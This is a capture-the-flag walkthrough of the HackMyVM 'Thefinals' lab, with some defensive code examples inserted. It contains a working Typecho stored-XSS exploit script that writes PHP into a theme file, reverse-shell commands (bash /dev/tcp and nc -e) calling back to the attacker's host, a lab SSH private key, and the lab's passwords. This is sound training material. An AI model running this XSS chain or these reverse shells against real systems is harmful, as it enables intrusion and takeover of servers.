HackMyVM - Thefinals

Thefinals.

https://hackmyvm.eu/machines/machine.php?vm=Thefinals

Notes: Please wait for the IP to appear on the screen and then start. If it doesn’t boot, please enable EFI in settings.

Initial Reconnaissance

➜  Thefinals nmap -sP 192.168.56.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-02 05:41 EDT
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 255 undergoing ARP Ping Scan
ARP Ping Scan Timing: About 2.35% done; ETC: 05:41 (0:00:00 remaining)
Nmap scan report for 192.168.56.1
Host is up (0.00036s latency).
MAC Address: 0A:00:27:00:00:09 (Unknown)
Nmap scan report for 192.168.56.2
Host is up (0.00025s latency).
MAC Address: 08:00:27:65:02:A9 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.56
Host is up (0.00050s latency).
MAC Address: 08:00:27:73:DF:E3 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.97 seconds
➜  Thefinals nmap -sT -min-rate 10000 -p- 192.168.56.56  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-02 08:07 EDT
Nmap scan report for 192.168.56.56
Host is up (0.00070s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:73:DF:E3 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 4.37 seconds
➜  Thefinals nmap -sT -A -T4 -O -p 22,80 192.168.56.56 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-02 08:08 EDT
Nmap scan report for 192.168.56.56
Host is up (0.00069s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.9 (protocol 2.0)
| ssh-hostkey:
| 256 42:a7:04:bb:da:b5:8e:71:7a:89:ff:a4:60:cd:4d:29 (ECDSA)
|_ 256 37:32:71:ca:3f:11:41:b4:d7:90:1e:c9:7f:e8:bc:20 (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Unix))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: THE FINALS
|_http-server-header: Apache/2.4.62 (Unix)
MAC Address: 08:00:27:73:DF:E3 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.69 ms 192.168.56.56

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.95 seconds

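Web Penetration

Information Gathering

Browse the HTTP service and fingerprint it; near the bottom of the page you can find THEFINALS.hmv, which is added to the hosts file.

To gather more information, start with a directory scan.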

➜  Thefinals gobuster dir -u http://thefinals.hmv/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,zip -b 403,404,301 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://thefinals.hmv/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 403,404,301
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 15280]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================
➜  Thefinals dirsearch -u http://thefinals.hmv -x 403,404,429 -e php,zip,txt
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, zip, txt | HTTP method: GET | Threads: 25 | Wordlist size: 10439

Output File: /root/Desktop/test/Thefinals/reports/http_thefinals.hmv/_25-05-02_22-34-19.txt

Target: http://thefinals.hmv/

[22:34:19] Starting:
[22:34:37] 301 - 311B - /blog -> http://thefinals.hmv/blog/
[22:34:37] 200 - 17KB - /blog/
[22:34:38] 200 - 820B - /cgi-bin/printenv
[22:34:38] 200 - 1KB - /cgi-bin/test-cgi
[22:34:41] 301 - 310B - /css -> http://thefinals.hmv/css/
[22:34:46] 301 - 312B - /fonts -> http://thefinals.hmv/fonts/
[22:34:49] 301 - 313B - /images -> http://thefinals.hmv/images/
[22:34:49] 200 - 606B - /images/
[22:34:51] 301 - 309B - /js -> http://thefinals.hmv/js/
[22:34:51] 200 - 694B - /js/
[22:35:05] 301 - 318B - /screenshots -> http://thefinals.hmv/screenshots/

Task Completed

The screenshots directory looks interesting.

Pick any few of the images and they are all the same; from them we learn that the Typecho version is 1.20.

Download all the images.

➜  Thefinals wget -r -l 1 -A png http://thefinals.hmv/screenshots/

After sorting by size, nothing useful turned up either.

➜  screenshots ls -al | grep -v 31556 
总计 7344
drwxr-xr-x 2 root root 12288 5月 2日 22:48 .
drwxr-xr-x 3 root root 4096 5月 2日 22:48 ..
-rw-r--r-- 1 root root 31554 5月 2日 05:28 1746178083.png
-rw-r--r-- 1 root root 31554 5月 2日 06:54 1746183243.png
-rw-r--r-- 1 root root 31554 5月 2日 07:10 1746184203.png
-rw-r--r-- 1 root root 31554 5月 2日 07:36 1746185763.png
-rw-r--r-- 1 root root 31554 5月 2日 07:54 1746186843.png
-rw-r--r-- 1 root root 31554 5月 2日 08:30 1746189003.png
-rw-r--r-- 1 root root 31554 5月 2日 08:58 1746190683.png
-rw-r--r-- 1 root root 31554 5月 2日 22:45 1746240303.png

Starting from public vulnerabilities: searching for typecho 1.2.0 directly turns up a stored XSS.

Stored XSS

EXP: https://www.cnblogs.com/superwinner/p/17349526.html | https://blog.csdn.net/m0_73299839/article/details/131939670 | https://blog.mo60.cn/index.php/archives/Typecho-1-2-xss2rce.html (the EXP is in the last blog post; the EXP path in the other posts is wrong)

// EXP: shell.js
function insertIframe() {
    // Get the current page path
    var urlWithoutDomain = window.location.pathname;
    // Check whether the page is the comment management page
    var hasManageComments = urlWithoutDomain.includes("manage-comments.php");
    var tSrc='';
    if (hasManageComments){
        // If so, rewrite the path to the page used for editing theme files
        tSrc=urlWithoutDomain.replace('manage-comments.php','theme-editor.php?theme=default&file=404.php');
    }else{
        // If not, use the theme file editor page address directly
        tSrc='/admin/theme-editor.php?theme=default&file=404.php';
    }
    // Define the iframe element's attributes: id, src, width, height and the onload event
    var iframeAttributes = "<iframe id='theme_id' src='"+tSrc+"' width='0%' height='0%' onload='writeShell()'></iframe>";
    // Get the original page content
    var originalContent = document.body.innerHTML;
    // Append the iframe element to the end of the page
    document.body.innerHTML = (originalContent + iframeAttributes);
}

// Global flag isSaved, initially false
var isSaved = false;

// Write a piece of PHP code inside the iframe and save it
function writeShell() {
    // Only if isSaved is false
    if (!isSaved) {
        // Get the content area and the "save file" button inside the iframe
        var content = document.getElementById('theme_id').contentWindow.document.getElementById('content');
        var btns = document.getElementById('theme_id').contentWindow.document.getElementsByTagName('button');
        // Get the original content of the template file
        var oldData = content.value;
        // Prepend a phpinfo snippet to the original content
        content.value = ('<?php phpinfo(); ?>\n') + oldData;
        // Click the "save file" button
        btns[1].click();
        // Set isSaved to true to mark the write as done
        isSaved = true;
    }
}
// Call insertIframe to add the iframe element and the event that writes the PHP code
insertIframe();
http://a.b/"></a><script/src=http://192.168.56.4:2131/shell.js></script><a/href="#

Open any article and post a comment:

After submitting, we can see the target server requesting our server.

Verify whether the exploit succeeded.

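The comment URL above works because the double quote in it survives into an href attribute. As an added example (not code from Typecho or from the original write-up), one way a comment handler could validate and escape that field, run against the payload shown above; the function names and the length limit are assumptions:

```python
import html
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Characters that can terminate an attribute value or open a tag.
FORBIDDEN_CHARS = set("\"'<>`\\")
MAX_URL_LENGTH = 255  # assumed limit for this example


def validate_comment_url(raw):
    """Return the URL if it is a plain http(s) link, otherwise None."""
    if not raw:
        return None
    url = raw.strip()
    if not url or len(url) > MAX_URL_LENGTH:
        return None
    # Reject quotes, angle brackets, whitespace and control characters
    # before parsing, so nothing can break out of href="...".
    if any(c in FORBIDDEN_CHARS or c.isspace() or ord(c) < 0x20 for c in url):
        return None
    try:
        parts = urlsplit(url)
    except ValueError:  # e.g. malformed IPv6 literal
        return None
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        return None
    return url


def render_author_link(name, raw_url):
    """Render the commenter's name, linked only when the URL validates."""
    safe_name = html.escape(name, quote=True)
    url = validate_comment_url(raw_url)
    if url is None:
        return safe_name  # drop the link instead of guessing a repair
    # Escape again at output time: validation and encoding are separate layers.
    return '<a href="{}" rel="external nofollow">{}</a>'.format(
        html.escape(url, quote=True), safe_name)


# The comment URL from the write-up, used here as test input.
PAGE_PAYLOAD = ('http://a.b/"></a><script/src=http://192.168.56.4:2131/shell.js>'
                '</script><a/href="#')

if __name__ == "__main__":
    print(render_author_link("guest", PAGE_PAYLOAD))
    print(render_author_link("guest", "https://example.org/?a=1&b=2"))
```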

RCE

Modify the EXP file to write a reverse shell statement.

exec("/bin/bash -c \'bash -i >& /dev/tcp/192.168.56.4/1234 0>&1\'"

The reverse shell did not connect back, so test whether nc exists.

exec("nc 192.168.56.4 1234")

It exists, so try building the reverse shell again.

exec("nc 192.168.56.4 1234 -e /bin/sh")

The phpinfo output shows that the system is Alpine Linux, and the default shell on Alpine Linux is not Bash or zsh but ash.

Finally, a shell is obtained by spawning /bin/ash.

exec("nc 192.168.56.4 1234 -e /bin/ash")

Privilege Escalation - To scotty

Information Gathering

user.txt can be found in the june user's home directory.

/home/june $ cat user.flag 

flag{4b5d61daf3e2e5ba57019f617012ad0919c2a6c29e11912aeadef2820be8f298}

Check the CMS configuration file.

// config db
$db = new \Typecho\Db('Pdo_Mysql', 'typecho_');
$db->addServer(array (
'host' => 'localhost',
'port' => 3306,
'user' => 'typecho_u',
'password' => 'QLTkbviW71CSRZtGWIQdB6s',
'charset' => 'utf8mb4',
'database' => 'typecho_db',
'engine' => 'InnoDB',
), \Typecho\Db::READ | \Typecho\Db::WRITE);
\Typecho\Db::set($db);

Log in to the database and look for interesting information.

/home/june $ mysql -u typecho_u -p
mysql: Deprecated program name. It will be removed in a future release, use '/usr/bin/mariadb' instead
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 4109
Server version: 11.4.5-MariaDB Alpine Linux

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>
MariaDB [typecho_db]> select * from typecho_users;
+-----+-------+------------------------------------+---------------------+---------------------------+------------+------------+------------+------------+---------------+----------------------------------+
| uid | name | password | mail | url | screenName | created | activated | logged | group | authCode |
+-----+-------+------------------------------------+---------------------+---------------------------+------------+------------+------------+------------+---------------+----------------------------------+
| 1 | staff | $P$B/qMMS9FETOrEZ38X0YDY5gKJOyiwQ1 | staff@thefinals.hmv | http://thefinals.hmv/blog | staff | 1743647281 | 1746272580 | 1746272521 | administrator | 213944c56e829e2cf7ec1de863ac3c03 |
+-----+-------+------------------------------------+---------------------+---------------------------+------------+------------+------------+------------+---------------+----------------------------------+
1 row in set (0.000 sec)

An attempt to crack the hash did not succeed.

Guessing Game

message.txt in the june user's home directory:

/home/june $ cat message.txt 
Contestants, gear up and get ready! Who's got the KEY? Who's got the the guts?
--- This BROADCAST has been hacked by CNS

A riddle? Try looking for files related to each user.

$ find / -user xxxx 2>/dev/null

Running it for the scotty user finds the following files:

$ find / -user scotty 2>/dev/null
/var/log/scotty-main.err
/var/log/scotty-main.log

Looking at /var/log/scotty-main.log, it indicates that broadcast packets were sent to port 1337 on the target host 192.168.56.57 (UDP or a protocol-specific probe).

// /var/log/scotty-main.log
Broadcast to eth0 192.168.56.57:1337
Broadcast to eth0 192.168.56.57:1337
Broadcast to eth0 192.168.56.57:1337

Receive it with nc.

/home $ nc -ulnvp 1337
listening on [::]:1337 ...
connect to [::ffff:192.168.56.57]:1337 from [::ffff:192.168.56.57]:40599 ([::ffff:192.168.56.57]:40599)
LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFNd0FBQUF0emMyZ3RaVwpReU5UVXhPUUFBQUNBMXduMDk0cGhPcXNmYm8rbzNDQllpTjN4QTE2eW1LU2JYMlVZMzJ4L0FFd0FBQUpnRGMvWVVBM1AyCkZBQUFBQXR6YzJndFpXUXlOVFV4T1FBQUFDQTF3bjA5NHBoT3FzZmJvK28zQ0JZaU4zeEExNnltS1NiWDJVWTMyeC9BRXcKQUFBRUN2N2tmZW9YT1FDaTVDUklXZEhpRFQ1dXBLeVkzdlF4QWxLbXhFUXpSWkxEWENmVDNpbUU2cXg5dWo2amNJRmlJMwpmRURYcktZcEp0ZlpSamZiSDhBVEFBQUFFbkp2YjNSQWRHaGxabWx1WVd4ekxtaHRkZ0VDQXc9PQotLS0tLUVORCBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0K

It looks base64-encoded, so try decoding it. The decoded result is a private key.

Finally, log in successfully with the private key.

➜  Thefinals vim sshkey  
➜ Thefinals chmod 600 sshkey
➜ Thefinals ssh scotty@thefinals.hmv -i sshkey
The authenticity of host 'thefinals.hmv (192.168.56.57)' can't be established.
ED25519 key fingerprint is SHA256:EzmhY2U9+FvurEu825jyirPaiFVcHNA2joTW03K3glk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'thefinals.hmv' (ED25519) to the list of known hosts.

thefinals:~$ whoami
scotty
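
The key could be picked up because it crossed the network as a base64 string in a cleartext UDP broadcast on port 1337. As an added example (not part of the original write-up), a payload inspector that flags PEM private-key headers, in the clear or wrapped in base64, of the kind a network sensor or DLP rule could apply; the function names and all sample payloads are constructed for illustration:

```python
import base64
import binascii
import re

# Runs long enough to hold an encoded PEM header; shorter runs are ignored.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")
PEM_HEADER = re.compile(rb"-----BEGIN ([A-Z0-9 ]*PRIVATE KEY)-----")


def find_private_keys(payload, max_depth=2):
    """Return [(depth, key_type)] for private-key headers found in payload.

    depth 0 means the header was in the clear; depth n means it was
    wrapped in n layers of base64.
    """
    hits = []

    def scan(data, depth):
        for match in PEM_HEADER.finditer(data):
            hits.append((depth, match.group(1).decode("ascii")))
        if depth >= max_depth:
            return
        for run in B64_RUN.findall(data):
            try:
                decoded = base64.b64decode(run, validate=True)
            except (binascii.Error, ValueError):
                continue  # not valid base64 (bad length or padding)
            scan(decoded, depth + 1)

    scan(payload, 0)
    return hits


def constructed_samples():
    """Constructed inputs: a fake PEM block (no real key material)."""
    body = base64.b64encode(b"constructed sample, not a real key")
    pem = (b"-----BEGIN OPENSSH PRIVATE KEY-----\n" + body +
           b"\n-----END OPENSSH PRIVATE KEY-----\n")
    return {
        "wrapped": base64.b64encode(pem),  # same shape as the broadcast payload
        "plain": pem,
        "benign": b"Broadcast to eth0 192.168.56.57:1337",
    }


if __name__ == "__main__":
    for name, data in constructed_samples().items():
        print(name, find_private_keys(data))
```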

Privilege Escalation - To root

Information Gathering

Check the sudo privileges: secret can be run as root without a password.

thefinals:~$ sudo -l
Matching Defaults entries for scotty on thefinals:
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for scotty:
Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User scotty may run the following commands on thefinals:
(ALL) NOPASSWD: /sbin/secret

Obtaining the Database Password & root Password

But I could not find any use for it.

thefinals:~$ sudo /sbin/secret
/sbin/secret: line 2: can't create /dev/pts/99: Permission denied
thefinals:~$ ls -al /sbin/secret
-rwx-----x 1 root root 51 Apr 23 17:17 /sbin/secret

But there is one message:

can't create /dev/pts/99: Permission denied

Looking at /dev/pts/, there are only 0 and 1.

thefinals:~$ ls -al /dev/pts
total 0
drwxr-xr-x 2 root root 0 May 3 13:24 .
drwxr-xr-x 14 root root 2840 May 3 13:25 ..
crw--w---- 1 apache tty 136, 0 May 3 20:08 0
crw--w---- 1 scotty tty 136, 1 May 3 20:22 1
c--------- 1 root root 5, 2 May 3 13:24 ptmx

After spawning a pseudo-terminal with python, /dev/pts/ gains one more entry.

These can now be created with a script or by hand.

#!/bin/ash
# File name: spawn_shells.sh
# Purpose: spawn interactive shells in a loop (for testing or special scenarios)

count=0
while [ $count -lt 90 ]
do
    echo "生成第 $((count+1)) 个 Shell..."
    python -c 'import pty; pty.spawn("/bin/sh")' &
    count=$((count+1))
done

echo "已完成 90 次 Shell 生成。"

Stop once 98 has been created, then run secret.

thefinals:/tmp$ sudo /sbin/secret 
root:p8RuoQGTtlKLAjuF1Tpy5wX
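
The output reaches scotty because the root-run script writes to a fixed path, /dev/pts/99, and a local user who allocates enough pseudo-terminals ends up owning that device. As an added example (not the contents of /sbin/secret, which the page does not show), a check a privileged helper could apply to the opened device before writing a secret to it; the function names and the uid 1000 are assumptions:

```python
import os
import stat


def tty_problems(st, recipient_uid):
    """Return reasons why a device with stat result st must not receive
    a secret intended for recipient_uid (empty list means acceptable)."""
    problems = []
    if not stat.S_ISCHR(st.st_mode):
        problems.append("not a character device")
    if st.st_uid != recipient_uid:
        problems.append("owned by uid %d, expected %d" % (st.st_uid, recipient_uid))
    return problems


def open_tty_for(path, recipient_uid):
    """Open path for writing and verify the opened descriptor, not the
    path, so the device cannot be swapped between check and use."""
    fd = os.open(path, os.O_WRONLY | os.O_NOCTTY | os.O_NOFOLLOW)
    problems = tty_problems(os.fstat(fd), recipient_uid)
    if not problems and not os.isatty(fd):
        problems.append("not a terminal")
    if problems:
        os.close(fd)
        raise PermissionError("%s rejected: %s" % (path, "; ".join(problems)))
    return fd


def constructed_stat(mode, uid):
    """Build an os.stat_result for the demo (only mode and uid matter)."""
    return os.stat_result((mode, 0, 0, 1, uid, 0, 0, 0, 0, 0))


# Modelled on the page's listing: crw--w---- owned by the logged-in user.
SCOTTY_UID, ROOT_UID = 1000, 0  # uid 1000 is an assumed value
USER_PTS = constructed_stat(stat.S_IFCHR | 0o620, SCOTTY_UID)
ROOT_PTS = constructed_stat(stat.S_IFCHR | 0o620, ROOT_UID)

if __name__ == "__main__":
    print(tty_problems(USER_PTS, ROOT_UID))  # rejected: wrong owner
    print(tty_problems(ROOT_PTS, ROOT_UID))  # accepted
```

Writing to the caller's own standard output instead of a numbered pts path avoids the problem altogether.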

I assumed this was root's password, but it turned out to be the database's; searching the data yields the root password.

MariaDB [secret]> select * from user;
+----+----------+-------------------------+
| id | username | password |
+----+----------+-------------------------+
| 1 | root | BvIpFDyB4kNbkyqJGwMzLcK |
+----+----------+-------------------------+
1 row in set (0.000 sec)
thefinals:/tmp$ su root
Password:
/tmp # id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
~ # cat root.flag 
_____ __ __ ______
/\ __\ /\ "-.\ \ /\ ___\
\ \ \___ \ \ \-. \ \ \___ \
\ \____\ \ \_\\"\_\ \ \_____\
\/____/ \/_/ \/_/ \/_____/

flag{8c5daa407626d218e962041dd8fd8f37913e56e32a6f06725da403175be0b9ff}
~ # cat note.txt 
ssh://root@thefinals.hmv:BvIpFDyB4kNbkyqJGwMzLcK
ssh://staff@thefinals.hmv:qDCsBTj30cQyityMh3Rnyys
ssh://june@thefinals.hmv:aYTmcORsUrmwaKa7C2DBLCh
ssh://scotty@thefinals.hmv:uuUoqAETern4v5tW2iMFs47

mariadb://root@localhost:p8RuoQGTtlKLAjuF1Tpy5wX

mariadb://typecho_u@typecho_db@localhost:QLTkbviW71CSRZtGWIQdB6s

typecho://staff@thefinals.hmv:n3nPbqEOhs6eTcchyqXTXWi
typecho://june@thefinals.hmv:DihPQiQqNO75vv8zNBzLwUm

flag{4b5d61daf3e2e5ba57019f617012ad0919c2a6c29e11912aeadef2820be8f298}
canyoureachthefinals -> sha256

flag{8c5daa407626d218e962041dd8fd8f37913e56e32a6f06725da403175be0b9ff}
youfinallyreachedthefinals -> sha256

THE FINALS is a great FPS game. A lot of inspiration comes from games. Try it on http://reachthefinals.com/